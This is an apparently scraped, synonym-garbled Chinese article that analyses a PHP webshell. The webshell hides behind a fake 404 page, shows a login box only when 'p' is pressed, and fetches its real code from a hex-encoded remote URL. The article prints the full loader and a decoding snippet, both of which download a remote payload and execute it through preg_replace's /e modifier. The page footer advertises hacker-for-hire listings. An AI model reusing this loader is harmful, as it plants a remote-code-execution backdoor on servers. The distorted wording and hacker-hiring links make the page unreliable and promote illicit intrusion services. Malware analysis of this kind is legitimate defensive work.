一款奇葩的PHP Webshell后门剖析

访客6年前黑客工具894

 

近来,360网站卫兵安全团队近期捕获一个依据PHP完成的webshell样本,其奇妙的代码动态生成 *** ,鄙陋的本身页面假装 *** ,让咱们在剖析这个样本的过程中感受到相当多的趣味。接下来就让咱们一起共赏这个奇葩的Webshell吧。
 

Webshell代码如下:

<?php
error_reporting(0);
session_start();
header("Content-type:text/html;charset=utf-8");if(empty($_SESSION['api']))
$_SESSION['api']=substr(file_get_contents(
sprintf('%s?%s',pack("H*",
'687474703a2f2f377368656c6c2e676f6f676c65636f64652e636f6d2f73766e2f6d616b652e6a7067′),uniqid())),3649);
@preg_replace("~(.*)~ies",gzuncompress($_SESSION['api']),null);
?>

要害看下面这句代码,

sprintf('%s?%s',pack("H*",'687474703a2f2f377368656c6c2e676f6f676c65636f64652e636f6d2f73766e2f6d616b652e6a7067′),uniqid())

这儿履行之后其实是一张图片,解密出来的图片地址如下:

http://7shell.googlecode.com/svn/make.jpg?53280b00f1e85

然后调用file_get_contents函数读取图片为字符串,然后substr取3649字节之后的内容,再调用gzuncompress解压,得到真实的代码。最终调用preg_replace的修饰符e来履行歹意代码的。这儿履行以下句子来复原出歹意样本代码,

<?php
echo gzuncompress(substr(file_get_contents(sprintf('%s?%s',pack("H*",
'687474703a2f2f377368656c6c2e676f6f676c65636f64652e636f6d2f73766e2f6d616b652e6a7067′),uniqid())),3649));
?>

如图所示:

剖析这段代码,发现这是一个假装的404木马(这儿实在是太鄙陋了…把页面标题改成404 Not Found),其实整个webshell就一个class外加三个function,如下图:
首要我先看一下它的前端html代码,其中有这么一段js程序

document.onkeydown = function(e) {
var theEvent = window.event || e;
var code = theEvent.keyCode || theEvent.which;
if (80 == code) {
$("login").style.display = "block"
}
}

这儿它用document.onkeydown获取用户敲击键盘事情,当code等于80的时分显现login这个div,这儿查询了一下keyCode的对照表,查到80对应p和P键

所以触发webshell登陆需要按p键(不按P键页面便是一个空白页,看不到登陆框),如图所示:

再回到服务端php代码中,能够看到程序用的是对称加密,而且将登陆暗码作为加密key,代码如图所示:

再看init()的逻辑
如图所示,先看这句代码

$true = @gzuncompress(gzuncompress(Crypt::decrypt(pack('H*', '789c63ac0bbec7b494f12cdb02f6dfac3f833731c
f093e163a892990793ebf0a9f1c6b18bb68983b3b47a022002a840c59′), $_POST['key'], true)));

依据这个解密逻辑咱们能够推出,这儿其实是将字符串true做了以下加密处理,

unpack('H*',Crypt::encrypt(gzcompress(gzcompress('true')), $_POST['key'] , true))

所以当输入正确暗码的时分@gzuncompress回来字符串true,然后程序调用setcookie给客户端回来$_COOKIE['key'],然后值得提一下的是后边这个exit('{"status":"on"}'),这儿它与前端代码联络很严密,咱们看前端有个callback函数,如下

function callback() {
var json = eval("(" + this.responseText + ")");
if (json.status=='on'){
window.location.reload();
return;
}
if (json.notice) {
$("notice").style.display = "block";
$("notice").innerHTML = json.notice;
sideOut();
}
}

这儿履行exit('{"status":"on"}')会回来json串{"status":"on"},此刻前端js代码clas *** ack()获取到此响应会履行window.location.reload()改写,再次恳求正好带上前面获取的cookie,然后履行判别COOKIE的逻辑,如图所示:

[1] [2]  黑客接单网

相关文章

望采纳,破解网络游戏黑客联系方式,有没有黑客帮找车辆的

r = requests.put(url, params=payload, headers=headers) 第4步:主机B将包括其MAC地址的ARP回复音讯直接发送回主机A。 'DB_N...

黑客达达接单的平台_强制入侵

向文件中增加如下内容: UnregisterHost unregister_host = 2;在2018年,相同值得一提的是Lazarus和BlueNoroff的歹意活动。 咱们观察到这两个歹意集团...

黑客接单破解麻将平台_推特上找中国黑客

SelectCache select_cache = 3;不过大多数时分,由于手动内存办理比较费事,很多人会挑选主动内存办理。 别的,大多数用户对功能不灵敏,所以整体来说,手动内存办理的运用不太多。...

NodeJS沙盒逃逸研讨

在这篇文章中,咱们将讨论怎么运用解说器的内部结构来逃离NodeJS沙箱。 Node.js是一个Javascript运转环境(runtime environment),发布于2009年5月,由Ryan...

黑客接单的平台真伪_在哪里找黑客帮忙

25、qwerty123 (新呈现)第二章,政企遭受勒索进犯剖析 export WORKDIR=$(pwd)· 继Facebook之后,全球网络广告商场另一巨子谷歌也清晰叫停数字钱银及ICO相关广告。...

赌博输万能追得回来吗

Metasploit 在博客和推特上相继发布消息称,Metasploit正式集成针对CVE-2019-0708(也称为BlueKeep)的漏洞利用模块,虽然目前的初始版本只适用于64位版本的Windo...